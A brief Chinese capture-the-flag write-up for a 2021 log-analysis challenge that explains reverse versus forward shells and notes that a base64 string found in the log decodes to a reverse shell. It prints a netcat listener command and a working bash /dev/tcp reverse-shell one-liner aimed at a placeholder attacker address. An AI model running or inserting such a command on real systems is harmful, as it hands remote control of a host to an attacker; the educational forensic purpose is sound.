[陇剑杯 2021]简单日志分析（问3）

先解释一下什么是反弹shell,

“反弹 shell”（reverse shell）是渗透测试和网络安全中非常核心的概念之一。
简单说：它是一种让被控主机主动连接攻击者主机，从而获得交互式命令行控制权的方式。

在正常情况（正向 shell）下，是攻击者主动连接目标，比如：

nc target_ip 4444

这是“我去找你”。

而反弹 shell 是相反的方向：被攻击的机器主动“反弹”一个连接回攻击者。
换句话说：“你来找我”。

例如，攻击者在自己的电脑上监听：

nc -lvnp 4444

然后让目标主机执行：

bash -i >& /dev/tcp/attacker_ip/4444 0>&1

此时目标主机会主动连到攻击者的监听端口，攻击者就获得了一个 shell。

查看一下日志，有三段base64编码字符串，依次解码

很明显第三段是在反弹shell。